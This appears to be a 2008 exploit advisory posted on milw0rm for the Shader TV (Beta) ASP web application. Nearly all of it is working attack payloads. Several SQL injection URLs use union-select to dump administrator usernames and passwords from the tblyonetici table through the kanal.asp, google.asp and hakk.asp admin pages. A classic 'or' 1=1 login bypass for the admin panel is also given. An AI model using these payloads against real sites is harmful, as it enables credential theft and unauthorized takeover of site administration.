Shader TV (Beta) Multiple Remote SQL Ä°njection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 | < Ugurcan Engin >
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
setuid.noexec0x1@hotmail.com
http://noexec.blogspot.com
0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !]
0x2 = [Ben Sadece Ä°yi Bir Ä°nsan Olmak Ä°stemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1
----
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici
Administrator Panel :
target/ShaderTV/yonet
-------------------------------
Admin Panel Login Bypass :
target/ShaderTV/yonet/default.asp
username : 'or' 1=1
password : 'or' 1=1
This is Admin Panel See You ?
---------------------------------
# milw0rm.com [2008-05-08]